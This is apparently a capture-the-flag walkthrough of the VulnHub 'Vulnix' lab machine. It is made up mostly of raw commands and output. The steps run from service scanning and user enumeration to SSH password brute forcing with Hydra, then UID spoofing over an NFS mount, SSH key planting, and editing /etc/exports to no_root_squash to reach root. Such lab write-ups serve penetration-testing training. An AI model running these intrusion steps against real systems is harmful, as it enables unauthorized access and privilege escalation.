VulnHub — Vulnix

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019–10–16T11:55:10+00:00; -3s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL RESP-CODES TOP UIDL STLS PIPELINING CAPA
|_ssl-date: 2019–10–16T11:55:10+00:00; -3s from scanner time.
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 36626/tcp6 mountd
| 100005 1,2,3 43733/udp6 mountd
| 100005 1,2,3 46737/tcp mountd
| 100005 1,2,3 60829/udp mountd
| 100021 1,3,4 39481/udp nlockmgr
| 100021 1,3,4 39797/tcp6 nlockmgr
| 100021 1,3,4 40801/tcp nlockmgr
| 100021 1,3,4 46294/udp6 nlockmgr
| 100024 1 34603/udp status
| 100024 1 36114/tcp status
| 100024 1 49520/udp6 status
| 100024 1 51984/tcp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: listed STARTTLS ENABLE capabilities LOGIN-REFERRALS have more IMAP4rev1 SASL-IR post-login Pre-login LOGINDISABLEDA0001 OK IDLE ID LITERAL+
|_ssl-date: 2019–10–16T11:55:11+00:00; -2s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
993/tcp open ssl/imaps?
|_ssl-date: 2019–10–16T11:55:10+00:00; -3s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2019–10–16T11:55:10+00:00; -3s from scanner time.
2049/tcp open nfs_acl 2–3 (RPC #100227)
36114/tcp open status 1 (RPC #100024)
40801/tcp open nlockmgr 1–4 (RPC #100021)
43232/tcp open mountd 1–3 (RPC #100005)
44143/tcp open mountd 1–3 (RPC #100005)
46737/tcp open mountd 1–3 (RPC #100005)
MAC Address: 08:00:27:E9:FD:8C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32–3.10
Uptime guess: 198.842 days (since Sun Mar 31 21:14:34 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 10.0.0.20
NSE: Script Post-scanning.
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.30 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
showmount -e 10.0.0.20
mount -t nfs 10.0.0.20:/home/vulnix /tmp/vulnix
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 10.0.0.20
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 
| Scan Information |
— — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Mode ………………… VRFY
Worker Processes ……… 5
Usernames file ……….. /usr/share/seclists/Usernames/top-usernames-shortlist.txt
Target count …………. 1
Username count ……….. 17
Target TCP port ………. 25
Query timeout ………… 5 secs
Target domain …………
######## Scan started at Wed Oct 16 22:06:40 2019 #########
10.0.0.20: root exists
10.0.0.20: user exists
######## Scan completed at Wed Oct 16 22:06:40 2019 #########
2 results.
17 queries in 1 seconds (17.0 queries / sec)
perl finger-user-enum.pl -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.0.0.20
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 
| Scan Information |
— — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Worker Processes ……… 5
Usernames file ……….. /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count …………. 1
Username count ……….. 113
Target TCP port ………. 79
Query timeout ………… 5 secs
Relay Server …………. Not used
######## Scan started at Wed Oct 16 22:11:21 2019 #########
@10.0.0.20: No one logged on…
bin@10.0.0.20: Login: bin Name: bin..Directory: /bin Shell: /bin/sh..Never logged in…No mail…No Plan…
daemon@10.0.0.20: Login: daemon Name: daemon..Directory: /usr/sbin Shell: /bin/sh..Never logged in…No mail…No Plan…
backup@10.0.0.20: Login: backup Name: backup..Directory: /var/backups Shell: /bin/sh..Never logged in…No mail…No Plan…
games@10.0.0.20: Login: games Name: games..Directory: /usr/games Shell: /bin/sh..Never logged in…No mail…No Plan…
gnats@10.0.0.20: Login: gnats Name: Gnats Bug-Reporting System (admin)..Directory: /var/lib/gnats Shell: /bin/sh..Never logged in…No mail…No Plan…
irc@10.0.0.20: Login: irc Name: ircd..Directory: /var/run/ircd Shell: /bin/sh..Never logged in…No mail…No Plan…
list@10.0.0.20: Login: list Name: Mailing List Manager..Directory: /var/list Shell: /bin/sh..Never logged in…No mail…No Plan…
lp@10.0.0.20: Login: lp Name: lp..Directory: /var/spool/lpd Shell: /bin/sh..Never logged in…No mail…No Plan…
libuuid@10.0.0.20: Login: libuuid Name: ..Directory: /var/lib/libuuid Shell: /bin/sh..Never logged in…No mail…No Plan…
mail@10.0.0.20: Login: mail Name: mail..Directory: /var/mail Shell: /bin/sh..Never logged in…No mail…No Plan…..Login: dovecot Name: Dovecot mail server..Directory: /usr/lib/dovecot Shell: /bin/false..Never logged in…No mail…No Plan…
messagebus@10.0.0.20: Login: messagebus Name: ..Directory: /var/run/dbus Shell: /bin/false..Never logged in…No mail…No Plan…
news@10.0.0.20: Login: news Name: news..Directory: /var/spool/news Shell: /bin/sh..Never logged in…No mail…No Plan…
nobody@10.0.0.20: Login: nobody Name: nobody..Directory: /nonexistent Shell: /bin/sh..Never logged in…New mail received Wed Oct 16 12:47 2019 (BST).. Unread since Thu Oct 3 14:02 2019 (BST)..No Plan…
man@10.0.0.20: Login: man Name: man..Directory: /var/cache/man Shell: /bin/sh..Never logged in…No mail…No Plan…
proxy@10.0.0.20: Login: proxy Name: proxy..Directory: /bin Shell: /bin/sh..Never logged in…No mail…No Plan…
root@10.0.0.20: Login: root Name: root..Directory: /root Shell: /bin/bash..Never logged in…No mail…No Plan…
sshd@10.0.0.20: Login: sshd Name: ..Directory: /var/run/sshd Shell: /usr/sbin/nologin..Never logged in…No mail…No Plan…
sync@10.0.0.20: Login: sync Name: sync..Directory: /bin Shell: /bin/sync..Never logged in…No mail…No Plan…
sys@10.0.0.20: Login: sys Name: sys..Directory: /dev Shell: /bin/sh..Never logged in…No mail…No Plan…
syslog@10.0.0.20: Login: syslog Name: ..Directory: /home/syslog Shell: /bin/false..Never logged in…No mail…No Plan…
uucp@10.0.0.20: Login: uucp Name: uucp..Directory: /var/spool/uucp Shell: /bin/sh..Never logged in…No mail…No Plan…
user@10.0.0.20: Login: user Name: user..Directory: /home/user Shell: /bin/bash..Last login Wed Oct 16 12:21 (BST) on pts/0 from 10.0.0.1..No mail…No Plan…..Login: dovenull Name: Dovecot login user..Directory: /nonexistent Shell: /bin/false..Never logged in…No mail…No Plan…
www-data@10.0.0.20: Login: www-data Name: www-data..Directory: /var/www Shell: /bin/sh..Never logged in…No mail…No Plan…
######## Scan completed at Wed Oct 16 22:11:21 2019 #########
24 results.
113 queries in 1 seconds (113.0 queries / sec)
hydra -l user -P /usr/share/wordlists/rockyou.txt 10.0.0.20 ssh
ssh user@10.0.0.20and using password letmein we got the ssh access 
adduser vulnix and then vim /etc/passwd nad change the vulnix uid and gid to 2008 as i had changed it manually using vim /etc/passwdand edited the vulnix uid and gidvulnix:x:2008:2008:,,,:/home/vulnix:/bin/bash
└──╼ #su vulnix
vulnix@PREDATOR:/root/predator/oscp/vulnhub/vulnix$ cd /tmp/
vulnix@PREDATOR:/tmp$ cd vulnix/
vulnix@PREDATOR:/tmp/vulnix$ ls -la
total 60
drwxr-x — — 5 vulnix vulnix 4096 Oct 16 17:11 .
drwxrwxrwt 20 root root 20480 Oct 16 21:58 ..
-rw — — — — 1 vulnix vulnix 905 Oct 3 18:58 .bash_history
-rw-r — r — 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r — r — 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx — — — 2 vulnix vulnix 4096 Oct 3 18:30 .cache
-rw-r — r — 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 Oct 3 18:30 .ssh
drwxr-xr-x 2 vulnix vulnix 4096 Oct 3 18:26 ssh
-rw-rw-r — 1 vulnix vulnix 8 Oct 16 17:11 sudoedit
vulnix@PREDATOR:/tmp/vulnix$
#NOTE :- leave password option empty to easy use└──╼ #ssh-keygen -f anythin
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in anythin.
Your public key has been saved in anythin.pub.
The key fingerprint is:
SHA256:GdD4S+KLFywZ13ePgO5zHtXXZQ9/16LYqpOk7Jmo8d8 root@PREDATOR
The key’s randomart image is:
+ — -[RSA 3072] — — +
| .o |
| … |
| o.. . o|
| . o =oo .. +=|
| * +So o.oo O|
| o + + +…oo|
| . + * .o o |
| o..=+= .o |
| ..o+= E*o |
+ — — [SHA256] — — -+
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix/ssh]
└──╼ #ls -la
total 16
drwxr-xr-x 2 root root 4096 Oct 16 22:38 .
drwxr-xr-x 4 root root 4096 Oct 16 22:37 ..
-rw — — — — 1 root root 2602 Oct 16 22:38 anythin
-rw-r — r — 1 root root 567 Oct 16 22:38 anythin.pub
vulnix@PREDATOR:/tmp/vulnix/.ssh$ echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXPFyuVB5alkcSh5RgReNwZsrHNbxMeM9QabAudiRZqmKOLd2CzT+d8g0rettno50KxsMemdX30nYT7ucYTErNnU7Slhaj2eg2XeDR6E7Zr5c+MsBXeZntPwZMaMj3t6Cz8v2DK2HuQ5sY0xsrVfqBlkbsiymh5tDHrnsI0jV3Oz+ml94/RW3VMTJpfO73UeQRdgePXjeCEgxtfHwnWVdgzbZty22nwXuFavyRppayVtaSXYmXpGGJ9rYYnjd2xituYkYDwQdD4K9w1HVt6vgvFZ5wPQdYMii503No5fYB8npfEr/T8iSXFMdauv2ODy7Rr6DR7DJmK212mtI9vUJBt9gszgP9hb9BkIRPJyklxL0Btr4Roi94d8otiUeuNY1V6OYM9oGQhT23927xXzwvlR4bCCzoQ67lGQxDzamtxzTlRrhhgnpP3EOvtmKAUlNApOkyuasDxW4dQ9t1IJve/Pk/lPUCdGL/G4GmH3rBaTBm7xVSUAsZ8YTkkSBUUw0= “ > authorized_keys
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #ssh -i anythin vulnix@10.0.0.20
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0–29-generic-pae i686)
* Documentation: https://help.ubuntu.com/System information as of Wed Oct 16 13:51:20 BST 2019System load: 0.01 Processes: 103
Usage of /: 92.0% of 773MB Users logged in: 1
Memory usage: 11% IP address for eth0: 10.0.0.20
Swap usage: 0%
=> / is using 92.0% of 773MBGraph this data and manage this system at https://landscape.canonical.com/Last login: Wed Oct 16 12:38:57 2019 from 10.0.0.1
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
vulnix@vulnix:~$
vulnix@vulnix:~$ sudo -l
Matching ‘Defaults’ entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$
chmod: changing permissions of `/bin/bash’: Operation not permitted
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)

NOTE :- and press ctrl+o to save the file
└──╼ #showmount -e 10.0.0.20
Export list for 10.0.0.20:
/root *
/home/vulnix *
mount -t nfs 10.0.0.20:/root /tmp/root
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #cd /tmp/root/
┌─[root@PREDATOR]─[/tmp/root]
└──╼ #ls -la
total 48
drwx — — — 3 root root 4096 Sep 3 2012 .
drwxrwxrwt 20 root root 20480 Oct 16 21:58 ..
-rw — — — — 1 root root 0 Sep 3 2012 .bash_history
-rw-r — r — 1 root root 3106 Apr 19 2012 .bashrc
drwx — — — 2 root root 4096 Sep 2 2012 .cache
-rw-r — r — 1 root root 140 Apr 19 2012 .profile
-r — — — — 1 root root 33 Sep 2 2012 trophy.txt
-rw — — — — 1 root root 710 Sep 2 2012 .viminfo
┌─[root@PREDATOR]─[/tmp/root]
└──╼ #
mkdir .sshcd .sshecho “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXPFyuVB5alkcSh5RgReNwZsrHNbxMeM9QabAudiRZqmKOLd2CzT+d8g0rettno50KxsMemdX30nYT7ucYTErNnU7Slhaj2eg2XeDR6E7Zr5c+MsBXeZntPwZMaMj3t6Cz8v2DK2HuQ5sY0xsrVfqBlkbsiymh5tDHrnsI0jV3Oz+ml94/RW3VMTJpfO73UeQRdgePXjeCEgxtfHwnWVdgzbZty22nwXuFavyRppayVtaSXYmXpGGJ9rYYnjd2xituYkYDwQdD4K9w1HVt6vgvFZ5wPQdYMii503No5fYB8npfEr/T8iSXFMdauv2ODy7Rr6DR7DJmK212mtI9vUJBt9gszgP9hb9BkIRPJyklxL0Btr4Roi94d8otiUeuNY1V6OYM9oGQhT23927xXzwvlR4bCCzoQ67lGQxDzamtxzTlRrhhgnpP3EOvtmKAUlNApOkyuasDxW4dQ9t1IJve/Pk/lPUCdGL/G4GmH3rBaTBm7xVSUAsZ8YTkkSBUUw0=” > authorized_keys
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #ssh -i anything root@10.0.0.20
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0–29-generic-pae i686)
* Documentation: https://help.ubuntu.com/System information as of Wed Oct 16 14:09:08 BST 2019System load: 0.03 Processes: 97
Usage of /: 92.1% of 773MB Users logged in: 1
Memory usage: 11% IP address for eth0: 10.0.0.20
Swap usage: 0%
=> / is using 92.1% of 773MBGraph this data and manage this system at https://landscape.canonical.com/Last login: Wed Oct 16 14:05:36 2019 from 10.0.0.1
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)

root@vulnix:~# ls
trophy.txt
root@vulnix:~#

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store